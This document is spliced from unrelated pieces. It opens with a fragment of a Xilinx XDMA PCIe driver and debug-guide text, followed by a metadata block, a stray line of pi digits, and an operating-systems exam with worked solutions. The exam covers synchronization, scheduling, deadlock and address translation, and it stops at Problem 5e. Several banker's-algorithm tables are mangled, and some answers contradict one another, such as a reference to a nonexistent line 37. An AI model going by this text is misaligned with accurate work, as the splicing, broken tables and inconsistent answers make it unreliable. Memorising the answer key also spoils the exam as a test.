w |= (u32) XDMA_CTRL_POLL_MODE_WB;
} else {
w |= (u32)XDMA_CTRL_IE_DESC_STOPPED;
w |= (u32)XDMA_CTRL_IE_DESC_COMPLETED;
/* Disable IDLE STOPPED for MM */
if ((engine->streaming && (engine->dir_to_dev == 0)) ||
(engine->xdma_perf))
w |= (u32)XDMA_CTRL_IE_IDLE_STOPPED;
}
dbg_tfr("Stopping SG DMA %s engine; writing 0x%08x to 0x%p.\n", engine->name, w, (u32 *)&engine->regs->control);
write_register(w, &engine->regs->control);
/* dummy read of status register to flush all previous writes */
dbg_tfr("xdma_engine_stop(%s) done\n", engine->name);
Write to `Block channel interrupt Enable Mask` 0x2014 to enable interrupt for next transfer.
/ * channel_interrups_enable -- Enable interrupts we are interested in */
static void channel_interrups_enable(struct xdma_dev *lro, u32 mask)
{
struct interrupt_regs *reg = (struct interrupt_regs *)
(lro->bar[lro->config_bar_idx] + XDMA_OFS_INT_CTRL);
write_register(mask, ®->channel_int_enable_w1s);
Return control to the application program with the transfer size.
static void __exit xdma_exit(void)
{
dbg_init(DRV_NAME" exit(\n");
/* unregister this driver from the PCI bus driver */
pci_unregister_driver(&pci_driver);
if (g_xdma_class)
class_destroy(g_xdma_class);
}
module_init(xdma_init);
module_exit(xdma_exit);
Reference
- (PG195): DMA/Bridge Subsystem for PCI Express v4.1
- (Xilinx Answer 65444): Xilinx PCI Express Drivers and Software Guide
|
{"Source-Url": "https://www.xilinx.com/Attachment/Xilinx_Answer_71435_XDMA_Debug_Guide.pdf", "len_cl100k_base": 9609, "olmocr-version": "0.1.53", "pdf-total-pages": 28, "total-fallback-pages": 0, "total-input-tokens": 63939, "total-output-tokens": 11372, "length": "2e13", "weborganizer": {"__label__adult": 0.000918865203857422, "__label__art_design": 0.0010318756103515625, "__label__crime_law": 0.0005640983581542969, "__label__education_jobs": 0.0006346702575683594, "__label__entertainment": 0.00025200843811035156, "__label__fashion_beauty": 0.0004589557647705078, "__label__finance_business": 0.00038242340087890625, "__label__food_dining": 0.000698089599609375, "__label__games": 0.00200653076171875, "__label__hardware": 0.218994140625, "__label__health": 0.0007772445678710938, "__label__history": 0.0005083084106445312, "__label__home_hobbies": 0.0003654956817626953, "__label__industrial": 0.003086090087890625, "__label__literature": 0.00029087066650390625, "__label__politics": 0.00046539306640625, "__label__religion": 0.0013275146484375, "__label__science_tech": 0.1888427734375, "__label__social_life": 8.440017700195312e-05, "__label__software": 0.0274200439453125, "__label__software_dev": 0.54833984375, "__label__sports_fitness": 0.0008273124694824219, "__label__transportation": 0.0011625289916992188, "__label__travel": 0.00031828880310058594}, "weborganizer_max": "__label__software_dev", "avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_ratio": [[0, 35847, 0.03952]], "fineweb_edu_fasttext_gt2__fineweb_edu_fasttext_gt2__score": [[0, 35847, 0.22751]], "ft_lang_id_en_doc_v2__ft_lang_id_en_doc_v2__en": [[0, 35847, 0.75507]], "google_gemma-3-12b-it_contains_pii": [[0, 1747, false], [1747, 2001, null], [2001, 4082, null], [4082, 5510, null], [5510, 7036, null], [7036, 8505, null], [8505, 10168, null], [10168, 10438, null], [10438, 10661, null], [10661, 12597, null], [12597, 13112, null], [13112, 14723, null], [14723, 15457, null], [15457, 18262, null], [18262, 18579, null], [18579, 18920, null], [18920, 19483, null], [19483, 20371, null], [20371, 21442, null], [21442, 22246, null], [22246, 23258, null], [23258, 24741, null], [24741, 27124, null], [27124, 28914, null], [28914, 30908, null], [30908, 33004, null], [33004, 34240, null], [34240, 35847, null]], "google_gemma-3-12b-it_is_public_document": [[0, 1747, true], [1747, 2001, null], [2001, 4082, null], [4082, 5510, null], [5510, 7036, null], [7036, 8505, null], [8505, 10168, null], [10168, 10438, null], [10438, 10661, null], [10661, 12597, null], [12597, 13112, null], [13112, 14723, null], [14723, 15457, null], [15457, 18262, null], [18262, 18579, null], [18579, 18920, null], [18920, 19483, null], [19483, 20371, null], [20371, 21442, null], [21442, 22246, null], [22246, 23258, null], [23258, 24741, null], [24741, 27124, null], [27124, 28914, null], [28914, 30908, null], [30908, 33004, null], [33004, 34240, null], [34240, 35847, null]], "google_gemma-3-4b-it_v2tag__is_academic_paper": [[0, 5000, false], [5000, 35847, null]], "google_gemma-3-4b-it_v2tag__is_class_syllabus": [[0, 5000, false], [5000, 35847, null]], "google_gemma-3-4b-it_v2tag__is_completion_certificate": [[0, 5000, false], [5000, 35847, null]], "google_gemma-3-4b-it_v2tag__is_court_notice": [[0, 5000, false], [5000, 35847, null]], "google_gemma-3-4b-it_v2tag__is_homework_assignment": [[0, 5000, false], [5000, 35847, null]], "google_gemma-3-4b-it_v2tag__is_news_article": [[0, 5000, false], [5000, 35847, null]], "google_gemma-3-4b-it_v2tag__is_public_order": [[0, 5000, false], [5000, 35847, null]], "google_gemma-3-4b-it_v2tag__is_resume_cv": [[0, 5000, false], [5000, 35847, null]], "google_gemma-3-4b-it_v2tag__is_test_or_quiz": [[0, 5000, false], [5000, 35847, null]], "google_gemma-3-4b-it_v2tag__is_textbook": [[0, 5000, false], [5000, 35847, null]], "pdf_page_numbers": [[0, 1747, 1], [1747, 2001, 2], [2001, 4082, 3], [4082, 5510, 4], [5510, 7036, 5], [7036, 8505, 6], [8505, 10168, 7], [10168, 10438, 8], [10438, 10661, 9], [10661, 12597, 10], [12597, 13112, 11], [13112, 14723, 12], [14723, 15457, 13], [15457, 18262, 14], [18262, 18579, 15], [18579, 18920, 16], [18920, 19483, 17], [19483, 20371, 18], [20371, 21442, 19], [21442, 22246, 20], [22246, 23258, 21], [23258, 24741, 22], [24741, 27124, 23], [27124, 28914, 24], [28914, 30908, 25], [30908, 33004, 26], [33004, 34240, 27], [34240, 35847, 28]], "pipe_delimited_lines_v1__pipe_delimited_lines_v1__pipe_delimited_lines_ratio": [[0, 35847, 0.03922]]}
|
olmocr_science_pdfs
|
2024-12-07
|
2024-12-07
|
64f400409d47e97f096d1f24f05bdf1966b809b7
|
General Information:
This is a \textbf{closed book} exam. You are allowed 1 page of \textbf{hand-written} notes (both sides). You
have 3 hours to complete as much of the exam as possible. Make sure to read all of the questions
first, as some of the questions are substantially more time consuming.
Write all of your answers directly on this paper. \textit{Make your answers as concise as possible}. On
programming questions, we will be looking for performance as well as correctness, so think through
your answers carefully. If there is something about the questions that you believe is open to
interpretation, please ask us about it!
\begin{tabular}{|c|c|c|}
\hline
\textbf{Problem} & \textbf{Possible} & \textbf{Score} \\
\hline
1 & 18 & \\
\hline
2 & 18 & \\
\hline
3 & 20 & \\
\hline
4 & 24 & \\
\hline
5 & 20 & \\
\hline
\hline
\textbf{Total} & \textbf{100} & \\
\hline
\end{tabular}
3.141592653589793238462643383279502884197169399375105820974944
Problem 1: TRUE/FALSE [18 pts]
In the following, it is important that you EXPLAIN your answer in TWO SENTENCES OR LESS (Answers longer than this may not get credit!). Also, answers without an explanation GET NO CREDIT.
Problem 1a[2pts]: When you type Ctrl+C to quit a program in your terminal, you are actually sending a SIGINT signal to the program, which makes it quit.
True / False
Explain: SIGINT is a vehicle for conveying a Ctrl-C requests from the terminal to the program. Assuming that the SIGINT handler has not been redirected, this will cause the program to quit. Note: we would also take “False” if you explain that the SIGINT handler might have been redirected.
Problem 1b[2pts]: The function pthread_intr_disable() is a crude but viable way for user programs to implement an atomic section.
True / False
Explain: This function does not exist. However, you cannot disable interrupt at user level in any case. A similarly-named routine (pthread_setintr()) simply disables the delivery of signals; it does not prevent multiple threads from executing concurrently—thus it could not be used to implement a critical section.
Problem 1c[2pts]: If the banker's algorithm finds that it's safe to allocate a resource to an existing thread, then all threads will eventually complete.
True / False
Explain: When the banker's algorithm finds that it's safe to allocate a resource, this simply means that threads could complete from a resource allocation standpoint. However, threads could still go into an infinite loop or otherwise fail to complete.
Problem 1d[2pts]: The lottery scheduler can be utilized to implement strict priority scheduling.
True / False
Explain: Strict priority scheduling would require the ability to have high-priority threads that receive all CPU time – at the expense of lower priority threads. The lottery scheduler will give some CPU time to every thread (except those which have zero tokens).
Problem 1e[2pts]: Locks can be implemented using semaphores.
True / False
Explain: Initializing a semaphore with the value “1” will cause it to behave like a lock. Semi.P() ⇒ acquire() and Semi.V() ⇒ release().
Problem 1f[2pts]: Two processes can share information by reading and writing from a shared linked list.
True / False
Explain: If a shared page is mapped into the same place in the address space of two processes, then they can share data structures that utilize pointers as long as they are stored in the shared page and pointers are to structures in the shared page.
Problem 1g[2pts]: In Pintos, a kernel-level stack can grow as large as it needs to be to perform its functions.
True / False
Explain: Stacks in the Pintos kernel must fit entirely into a 4K page. In fact, they share the 4K page with the corresponding Thread Control Block (TCB).
Problem 1h[2pts]: Suppose that a shell program wants to execute another program and wait on its result. It does this by creating a thread, calling exec from within that thread, then waiting in the original thread.
True / False
Explain: The shell program must create a new process (not thread!) before calling exec() otherwise, the exec() call will terminate the existing process and start a new process – effectively terminating the shell.
Problem 1i[2pts]: A network server in Linux works by calling bind() on a socket, and then calling listen() on the socket in a loop to wait for new clients.
True / False
Explain: The server calls listen() only once, then accept() multiple times in a loop.
Problem 2: Short Answer [18pts]
Problem 2a[2pts]: How does a modern OS regain control of the CPU from a program stuck in an infinite loop?
Assuming that we are talking about a user-level program (or a kernel thread with interrupts enabled), the timer interrupt handler (triggered by the timer) will enter the scheduler and recover the CPU from a program that is stuck in an infinite loop.
Problem 2b[2pts]: Is it possible for an interrupt handler (code triggered by a hardware interrupt) to sleep while waiting for another event? If so, explain how. If not, explain why not.
There are actually two possible answers to this question. (1) “NO”: Strictly speaking, an interrupt handler must not sleep while waiting for another event, since it doesn’t have a thread-control block (context) to put onto a wait queue and is operating with interrupts disabled. However, one could also answer (2) “YES”: an interrupt handler that wants to sleep must allocate a new kernel thread to finish its work, place the thread on a wait queue, then return from the interrupt (reenabling interrupts in the process).
Problem 2c[2pts]: Why is it important for system calls to be vectored through the syscall table (indexed by an integer syscall number) rather than allowing the user to specify a function address to be called by the kernel after it transitions to kernel mode?
If the user were able to specify an arbitrary address for execution in the kernel, then they could bypass checking and find many ways to violate protection. Consequently, the user must specify a syscall number during the execution of a system call. The hardware then atomically raises the hardware level to “kernel level” while executing the system call from the specified entry point.
Problem 2d[3pts]: Name two advantages and one disadvantage of implementing a threading package at user level (e.g. “green threads”) rather than relying on thread scheduling from within the kernel.
Advantages include: very fast context switch (all at user level, no system call), very low overhead thread fork, and user-configurable scheduling. One very important disadvantage is the fact that all threads will get put to sleep when any one thread enters into the kernel and blocks on I/O.
Problem 2e[2pts]: List two reasons why overuse of threads is bad (i.e. using too many threads for different tasks). Be explicit in your answers.
There a number of possible answers (1) Too many threads scheduled simultaneously can lead to excessive context switch overhead. (2) Too many threads can lead to memory overutilization. (3) Too many threads can cause excessive synchronization overhead (many locks to handle all the parallelism).
Problem 2f[2pts]: What was the problem with the Therac-25? Your answer should involve one of the topics of the class.
The Therac-25 had a number of synchronization problems, including improper synchronization between the operator console and the turntable mechanism which caused patients to receive the wrong type and dosage of radiation.
Problem 2g[2pts]: Why is it possible for a web browser (such as Firefox) to have 2 different tabs opened to the same website (at the same remote IP address and port) without mixing up content directed at each tab?
Because a unique TCP/IP connection consists of a 5-tuple, namely [source IP, source Port, destination IP, destination Port, and protocol] (where the protocol is “6” for TCP/IP – which you didn’t need to know). Consequently, although the web browser might have many connections with the same source IP address, destination IP address and destination Port, they will all have unique source ports, allowing them to be unique.
Problem 2h[3pts]: What are some of the hardware differences between kernel mode and user mode? Name at least three.
There are a number of differences: (1) There is at least one status bit (the “kernel mode bit”) which changes between kernel mode and user mode. In an x86 processor, there are 2 bits which change (since there a 4 modes). (2) Additional kernel-mode instructions are available (such as those that modify the page table registers, those that enable and disable interrupts, etc). (3) Pages marked as kernel-mode in their PTEs are only available in kernel mode. (4) Control for I/O devices (such as the timer, interrupt controllers, and device controllers) are typically only available from kernel mode.
Problem 3: Boy-Girl Lock [20pts]
A boy-girl lock is a sort of generalized reader-writer lock: in a reader-writer lock there can be any number of readers or a single writer (but not both readers and writers at the same time), while in a boy-girl lock there can be any number of boys or any number of girls (but not both a boy and a girl at the same time). Assume that we are going to implement this lock at user level utilizing pThread monitors (i.e., pThread mutexes and condition variables). Note that the assumption here is that we will put threads to sleep when they attempt to acquire the lock as a Boy when it is already acquired by one or more Girls and vice-versa. You must implement the behavior using condition variable(s). Points will be deducted for any spin-waiting behavior.
Some snippets from POSIX Thread manual pages showing function signatures are shown at end of this problem. They may or may not be useful.
Our first take at this lock is going to utilize the following structure and enumeration type:
```c
/* The basic structure of a boy-girl lock */
struct bglock {
pthread_mutex_t lock;
pthread_cond_t wait_var;
// Simple state variable
int state;
};
/* Enumeration to indicate type of requested lock */
enum bglock_type {
BGLOCK_BOY = 0;
BGLOCK_GIRL = 1;
};
/* interface functions: return 0 on success, error code on failure */
int bglock_init(struct bglock *lock);
int bglock_lock(struct bglock *lock, enum bglock_type type);
int bglock_unlock(struct bglock *lock);
```
Note that the lock requestor specifies the type of lock that they want at the time that they make the request:
```c
/* Request a Boy lock */
if (bglock_lock(mylock, BGLOCK_BOY) {
printf(“Lock request failed!”);
exit(1);
}
/* . . . Code using lock . . . */
/* Release your lock */
bglock_unlock(mylock);
```
Problem 3a[3pts]: Complete the following sketch for the initialization function. Note that initialization should return zero on success and a non-zero error code on failure (e.g. return the failure code, if you encounter one, from the various synchronization functions). Hint: the state of the lock is more than just “acquired” or “free”.
```c
/* Initialize the BG lock.
* Args: pointer to a bglock
* Returns: 0 (success)
* non-zero (errno code from synchronization functions)
*/
int bglock_init(struct bglock *lock) {
int result;
lock->state = 0; // No lock holders of any type
if (result = pthread_mutex_init(&(lock->lock), NULL))
return result; // Error
result = pthread_cond_init(&(lock->wait_var), NULL);
return result;
}
```
Problem 3b[5pts]: Complete the following sketch for the lock function. Think carefully about the state of the lock; when you should wait, when you can grab the lock.
```c
/* Grab a BG lock.
* Args: (pointer to a bglock, enum lock type)
* Returns: 0 (lock acquired)
* non-zero (errno code from synchronization functions)
*/
int bglock_lock(struct bglock *lock, enum bglock_type type) {
int dir = (type == BGLOCK_BOY)?1:-1; // Direction
int result;
// Grab monitor lock
if (result = pthread_mutex_lock(&(lock->lock)))
return result; // error
while (lock->state * dir < 0) {
// Incompatible threads already have bglock, must sleep
if (result = pthread_cond_wait(&(lock->wait_var),&(lock->lock)))
return result; // error
}
lock->state += dir; // register new bglock holder of this type
// Release monitor lock
result = pthread_mutex_unlock(&(lock->lock));
return result;
}
```
**Problem 3c[5pts]:** Complete the following sketch for the unlock function.
```c
/* Release a BG lock.
* * Args: pointer to a bglock
* * Returns: 0 (lock acquired)
* * non-zero (errno code from synchronization functions)
* */
int bglock_unlock(struct bglock *lock) {
int result;
// Grab monitor lock
if (result = pthread_mutex_lock(&(lock->lock)))
return result; // error
// one less bglock holder of this type
lock->state -= (lock->state > 0)?1:-1; // Direction
// If returning to neutral status, signal any waiters
if (lock->state == 0)
if (result = pthread_cond_broadcast(&(lock->wait_var)))
return result; // error
// Release monitor lock
result = pthread_mutex_unlock(&(lock->lock));
return result;
}
```
**Problem 3d[2pts]:** Consider a group of “nearly” simultaneous arrivals (i.e. they arrive in a period much quicker than the time for any one thread that has successfully acquired the BGlock to get around to performing bglock_unlock()). Assume that they enter the bglock_lock() routine in this order:
B1, B2, G1, G2, B3, G3, B4, B5, B6, B7
How will they be grouped? (Place braces, namely “{” around requests that will hold the lock simultaneously). This simple lock implementation (with a single state variable) is subject to starvation. Explain.
All of the boy requests will go first, followed by girl requests:
{ B1, B2, B3, B4, B5, B6, B7 }, { G1, G2, G3 }
This implementation experiences starvation because a series of waiting girl lock requests could be arbitrarily held off if there is a stream of boy requests (and vice-versa).
Problem 3e[5pts]: Suppose that we want to enforce fairness, such that Boy and Girl requests are divided into phases based on arrival time into the `bglock_lock()` routine. Thus, for instance, an arrival stream of Boys and Girls such as this:
\[B_1, B_2, G_1, G_2, G_3, G_4, B_3, G_5, B_4, B_5\]
will get granted in groups such as this:
\[
\{B_1, B_2\}, \{G_1, G_2, G_3\}, \{B_3\}, \{G_5\}, \{B_4, B_5\}
\]
Explain what the minimum changes are that you would need to make to the `bglock` structure to meet these requirements and sketch out what you would do during `bglock_init()` and `bglock_lock()` and `bglock_unlock()` routines. You do not need to write actual code, but should be explicit about what your `bglock` structure would look like and how you would use its fields to accomplish the desired behavior.
Here, we number phases starting from zero (with wraparound). We expand our state variable to queue of state variables. Each incoming thread figures out which phase they are in and then optionally sleeps (if they are not in the current phase). Our new `bglock` looks like this:
```c
struct bglock {
pthread_mutex_t lock;
pthread_cond_t wait_var;
int headphase, tailphase;
int state[MAX_PHASES+1];
};
```
`bglock_init()`: initialize lock and wait_var; headphase=0; tailphase=0; state[x]=0 for all x;
`bglock_lock()`: if state[tailphase] doesn’t match request, increment tailphase (with wrapping – may have to sleep if already have MAX_PHASES phases). In whatever case, increment state[tailphase] in correct direction (+1 or -1) depending on desired type of lock. Save current tailphase as your phase. Then, wait on condition variable until headphase == current tailphase.
`bglock_unlock()`: Decrement state[headphase] in correct direction (-1 or +1) depending on desired type of lock. If state[headphase]==0, check to see if headphase!=tailphase. If so, headphase++, broadcast to wake up everyone on condition variable.
Note that you can optimize wakeup behavior by adding a queue of condition variables as well, although this will increase the amount of state in the bglock.
Assorted POSIX Thread Manual Snippets for Problem 3
PTHREAD_MUTEX_DESTROY(3P): initialization/destruction of mutexes
```c
int pthread_mutex_destroy(pthread_mutex_t *mutex);
int pthread_mutex_init(pthread_mutex_t *restrict mutex,
const pthread_mutexattr_t *restrict attr);
pthread_mutex_t mutex = PTHREAD_MUTEX_INITIALIZER;
```
PTHREAD_MUTEX_LOCK(3P): use of mutex
```c
int pthread_mutex_lock(pthread_mutex_t *mutex);
int pthread_mutex_trylock(pthread_mutex_t *mutex);
int pthread_mutex_unlock(pthread_mutex_t *mutex);
```
PTHREAD_COND_DESTROY(3P): initialization/destruction of condition variables
```c
int pthread_cond_destroy(pthread_cond_t *cond);
int pthread_cond_init(pthread_cond_t *restrict cond,
const pthread_condattr_t *restrict attr);
pthread_cond_t cond = PTHREAD_COND_INITIALIZER;
```
PTHREAD_COND_TIMEDWAIT(3P): sleeping on condition variables
```c
int pthread_cond_timedwait(pthread_cond_t *restrict cond,
pthread_mutex_t *restrict mutex,
const struct timespec *restrict abstime);
int pthread_cond_wait(pthread_cond_t *restrict cond,
pthread_mutex_t *restrict mutex);
```
PTHREAD_COND_BROADCAST(3P): signaling of threads waiting on condition variables
```c
int pthread_cond_broadcast(pthread_cond_t *cond);
int pthread_cond_signal(pthread_cond_t *cond);
```
Problem 4: Scheduling and Deadlock [24 pts]
Problem 4a[3pts]: What is priority inversion and why is it an important problem? Present a priority inversion scenario in which a lower priority process can prevent a higher-priority process from running (assume that there is no priority donation mechanism):
Priority inversion is a situation in which a lower-priority task is allowed to run over a higher-priority task. Consider three tasks in priority order: T1, T2, and T3 (i.e. T1 is lowest, T3 is highest). Suppose that T1 grabs a lock, T2 starts running, then T3 tries to grab the lock (and sleeps). Here, T2 is effectively preventing T3 from running (since T2 is preventing T1 from running, which is preventing T3 from running). The result is priority inversion.
Problem 4b[3pts]: How does the Linux CFS (“Completely Fair Scheduler”) scheduler decide which thread to run next? What aspect of its behavior is “fair”? (You can ignore the presence of priorities or “nice” values in your answer):
The Linux CFS scheduler computes something called “virtual time” which is a scaled version of real CPU time. The scheduler attempts to make sure that every thread has an equal amount of virtual time. Thus, to decide which thread to run next, it simply picks the thread with the least amount of accumulated virtual time. This behavior is considered “fair” because it attempts to distribute the same total virtual time to every thread.
```c
void main (void) {
1 thread_set_priority(10);
2 struct lock a, b, c;
3 lock_init(&a);
4 lock_init(&b);
5 lock_init(&c);
6 lock_acquire(&a);
7 lock_acquire(&b);
8 lock_acquire(&c);
9 printf("1");
10 thread_create("a",15,func,&a);
11 printf("6");
12 thread_create("b",20,func,&b);
13 printf("2");
14 thread_create("c",25,func,&c);
15 lock_release(&c);
16 lock_release(&a);
17 lock_release(&b);
18 printf("!");
}
void func(void* lock_) {
19 struct lock *lock = lock_;
20 lock_acquire(&lock);
21 lock_release(&lock);
22 printf("%s",thread_current()->name);
23 thread_exit();
}
```
Problem 4c[2pts]: Consider the above PintOS test that exercises your priority scheduler. Assume that no priority donation has been implemented. What does it output to the terminal? Is the output affected by priorities in any way? Explain.
This code will output “162cab!”. This result is not affected by priorities (as long as all threads running “func()” are higher priority than “main()”), since high-priority threads go to sleep almost immediately after they start and are released in order by lines #15, #16, and #37.
**Problem 4d [5pts]:** Next, assume that the code from (4c) is executed utilizing priority donation. Fill in the following table to detail execution. This table includes 7 columns as following:
1) The current executing thread
2) Which line this thread was executing when it yielded
3) To which thread it yielded
4-7) The priorities of each thread (N/A if a thread is not created or has exited)
<table>
<thead>
<tr>
<th>thread_current()</th>
<th>Line at which yielded</th>
<th>Thread which it yielded to</th>
<th>Main</th>
<th>a</th>
<th>b</th>
<th>c</th>
</tr>
</thead>
<tbody>
<tr>
<td>main</td>
<td>10</td>
<td>a</td>
<td>10</td>
<td>15</td>
<td>N/A</td>
<td>N/A</td>
</tr>
<tr>
<td>a</td>
<td>20</td>
<td>main</td>
<td>15</td>
<td>15</td>
<td>N/A</td>
<td>N/A</td>
</tr>
<tr>
<td>main</td>
<td>12</td>
<td>b</td>
<td>15</td>
<td>15</td>
<td>20</td>
<td>N/A</td>
</tr>
<tr>
<td>b</td>
<td>20</td>
<td>main</td>
<td>20</td>
<td>15</td>
<td>20</td>
<td></td>
</tr>
<tr>
<td>main</td>
<td>14</td>
<td>c</td>
<td>20</td>
<td>15</td>
<td>20</td>
<td>25</td>
</tr>
<tr>
<td>c</td>
<td>20</td>
<td>main</td>
<td>25</td>
<td>15</td>
<td>20</td>
<td>25</td>
</tr>
<tr>
<td>main</td>
<td>15</td>
<td>c</td>
<td>20</td>
<td>15</td>
<td>20</td>
<td>25</td>
</tr>
<tr>
<td>c</td>
<td>23</td>
<td>main</td>
<td>20</td>
<td>15</td>
<td>20</td>
<td>N/A</td>
</tr>
<tr>
<td>main</td>
<td>17</td>
<td>b</td>
<td>10</td>
<td>15</td>
<td>20</td>
<td>N/A</td>
</tr>
<tr>
<td>b</td>
<td>23</td>
<td>a</td>
<td>10</td>
<td>15</td>
<td>N/A</td>
<td>N/A</td>
</tr>
<tr>
<td>a</td>
<td>23</td>
<td>main</td>
<td>10</td>
<td>N/A</td>
<td>N/A</td>
<td>N/A</td>
</tr>
</tbody>
</table>
**Problem 4e [2pts]:** What is printed according to the order of execution in (4d)? Is the output affected by priorities in any way? Explain.
*What is printed is: “162cba!”. Yes, the output is affected by priorities in that thread “b” gets to acquire lock “b” before thread “a” acquires lock “a”. The ordering of letters happens in priority order.*
Problem 4f[4pts]:
Suppose that we have the following resources: A, B, C and threads T1, T2, T3, T4. The total number of each resource is:
<table>
<thead>
<tr>
<th>Total</th>
</tr>
</thead>
<tbody>
<tr>
<td>A</td>
</tr>
<tr>
<td>B</td>
</tr>
<tr>
<td>C</td>
</tr>
<tr>
<td>12</td>
</tr>
<tr>
<td>9</td>
</tr>
<tr>
<td>12</td>
</tr>
</tbody>
</table>
Further, assume that the processes have the following maximum requirements and current allocations:
<table>
<thead>
<tr>
<th>Thread ID</th>
<th>Current Allocation</th>
<th>Maximum</th>
</tr>
</thead>
<tbody>
<tr>
<td></td>
<td>A</td>
<td>B</td>
</tr>
<tr>
<td>T1</td>
<td>2</td>
<td>1</td>
</tr>
<tr>
<td>T2</td>
<td>1</td>
<td>2</td>
</tr>
<tr>
<td>T3</td>
<td>5</td>
<td>4</td>
</tr>
<tr>
<td>T4</td>
<td>2</td>
<td>1</td>
</tr>
</tbody>
</table>
Is the system in a safe state? If “yes”, show a non-blocking sequence of thread executions. Otherwise, provide a proof that the system is unsafe. Show your work and justify each step of your answer.
Answer: Yes, this system is in a safe state.
To prove this, we first compute the currently free allocations:
<table>
<thead>
<tr>
<th>Available</th>
</tr>
</thead>
<tbody>
<tr>
<td>A</td>
</tr>
<tr>
<td>2</td>
</tr>
</tbody>
</table>
Further, we compute the number needed by each thread (Maximum – Current Allocation):
<table>
<thead>
<tr>
<th>Thread ID</th>
<th>Needed Allocation</th>
</tr>
</thead>
<tbody>
<tr>
<td></td>
<td>A</td>
</tr>
<tr>
<td>T1</td>
<td>2</td>
</tr>
<tr>
<td>T2</td>
<td>4</td>
</tr>
<tr>
<td>T3</td>
<td>1</td>
</tr>
<tr>
<td>T4</td>
<td>2</td>
</tr>
</tbody>
</table>
Thus, we can see that a possible sequence is: T3, T2, T4, T1:
Problem 4g [3pts]:
Assume that we start with a system in the state of (4f). Suppose that T1 asks for 2 more copies of resource A. Can the system grant this if it wants to avoid deadlock? Explain.
\[ \text{No. This cannot be granted. Assume that T1 gets 2 more of A.} \]
Then, our available allocation is:
<table>
<thead>
<tr>
<th>Available</th>
</tr>
</thead>
<tbody>
<tr>
<td>A</td>
</tr>
<tr>
<td>0</td>
</tr>
</tbody>
</table>
Then, looking at our needed allocations, we see:
<table>
<thead>
<tr>
<th>Thread ID</th>
<th>Needed Allocation</th>
</tr>
</thead>
<tbody>
<tr>
<td></td>
<td>A</td>
</tr>
<tr>
<td>T1</td>
<td>0</td>
</tr>
<tr>
<td>T2</td>
<td>4</td>
</tr>
<tr>
<td>T3</td>
<td>1</td>
</tr>
<tr>
<td>T4</td>
<td>2</td>
</tr>
</tbody>
</table>
At this point, the available allocation is insufficient to start any of the threads, much less find a safe sequence that finishes all of them.
Problem 4h [2pts]: Assume that a set of threads (T1, T2, ... Tn) contend for a set of non-preemptable resources (R1, R2, ... Rm) that may or may not be unique. Name at least two techniques to prevent this system from deadlocking:
We discussed several possible ways of preventing deadlock in class. Possibilities include:
1) Pick a fixed order of allocation (say R1 then R2 then ... Rm). All threads should allocate resources in this order.
2) Every thread should indicate which resources they want at the beginning of execution. Then, the thread is not allowed to start until after the requested resources are all available.
3) Use the Bankers algorithm on every allocation request to make sure that the system stays in a safe state.
Problem 5: Address Translation [20 pts]
Problem 5a[3pts]: In class, we discussed the “magic” address format for a multi-level page table on a 32-bit machine, namely one that divided the address as follows:
<table>
<thead>
<tr>
<th>Virtual Page # (10 bits)</th>
<th>Virtual Page # (10 bits)</th>
<th>Offset (12 bits)</th>
</tr>
</thead>
</table>
You can assume that Page Table Entries (PTEs) are 32-bits in size in the following format:
<table>
<thead>
<tr>
<th>Physical Page # (20 bits)</th>
<th>OS Defined (3 bits)</th>
<th>0</th>
<th>Large Page</th>
<th>Dirty</th>
<th>Accessed</th>
<th>Nocache</th>
<th>Througeh</th>
<th>Write</th>
<th>User</th>
<th>Writeable</th>
<th>Valid</th>
</tr>
</thead>
</table>
What is particularly “magic” about this configuration? Make sure that your answer involves the size of the page table and explains why this configuration is helpful for an operating system attempting to deal with limited physical memory.
Each page is 4K in size (12-bit offset \( \Rightarrow 2^{12} \) bytes). Because the PTE is 4-bytes long and each level of the page table has 1024 entries (i.e. 10-bit virtual page #), this means that each level of the page table is 4K in size, i.e. exactly the same size as a page. Thus the configuration is “magic” because every level of the page table takes exactly one page. This is helpful for an operating system because it allows the OS to page out parts of the page table to disk.
Problem 5b[2pts]: Modern processors nominally address 64-bits of address space both virtually and physically (in reality they provide access to less, but ignore that for now). Explain why the page table entries (PTEs) given in (5a) would have to be expanded from 4 bytes and justify how big they would need to be. Assume that pages are the same size and that the new PTE has similar control bits to the version given in (5a).
Since we are attempting to address 64-bits of physical DRAM and the page offset is 12-bits, this leaves 52-bits of physical page # that will have to fit into the PTE. The old PTE had only 20-bits of space for physical page #. In fact, we need another 32-bits of offset \( \Rightarrow \) PTE needs 52-bits of offset+12-bits of control bits (to be the same), yielding 64-bits of PTE, or 8-bytes.
Problem 5c[2pts]: Assuming that we reserve 8-bytes for each PTE in the page table (whether or not they need all 8 bytes), how would the virtual address be divided for a 64-bit address space? Make sure that your resulting scheme has a similar “magic” property as in (5a) and that all levels of the page table are the same size—with the exception of the top-level. How many levels of page table would this imply? Explain your answer!
To have the same “magic” property, we would like each level of the page table to be the same size as a page — so that the OS could page out individual parts of the page table. Since a PTE is 8-bytes (3-bits in size), this means we need 12-3 = 9-bits of virtual page # at each level. This means that the virtual address needs to be divided into groupings of 9-bits (although the top level be smaller, since we only have 64-bits):
\[ [7\text{-bits}][9\text{-bits}][9\text{-bits}][9\text{-bits}][9\text{-bits}][9\text{-bits}][12\text{-bits offset}] \]
Thus, there are 6 levels of page table.
**Problem 5d[3pts]:** Consider a multi-level memory management scheme using the following format for *virtual addresses*, including 2 bits worth of segment ID and an 8-bit virtual page number:
<table>
<thead>
<tr>
<th>Virtual seg # (2 bits)</th>
<th>Virtual Page # (8 bits)</th>
<th>Offset (8 bits)</th>
</tr>
</thead>
</table>
Virtual addresses are translated into 16-bit *physical addresses* of the following form:
<table>
<thead>
<tr>
<th>Physical Page # (8 bits)</th>
<th>Offset (8 bits)</th>
</tr>
</thead>
</table>
Page table entries (PTE) are 16 bits in the following format, *stored in big-endian form* in memory (i.e. the MSB is first byte in memory):
<table>
<thead>
<tr>
<th>Physical Page # (8 bits)</th>
<th>Kernel</th>
<th>Nocache</th>
<th>0</th>
<th>0</th>
<th>Dirty</th>
<th>Use</th>
<th>Writeable</th>
<th>Valid</th>
</tr>
</thead>
</table>
2) How big is a page? Explain.
*A page is $2^8=256$ bytes.*
2) What is the maximum amount of physical memory supported by this scheme? Explain
*Physical addresses have 16-bits $\Rightarrow 2^{16}=65536$ bytes (i.e. 64K bytes)*
**Problem 5e[10pts]:** Using the scheme from (5d) and the Segment Table and Physical Memory table on the next page, state what will happen with the following loads and stores. Addresses below are virtual, while base addresses in the segment table are physical. If you can translate the address, make sure to place it in the “Physical Address” column; otherwise state “N/A”.
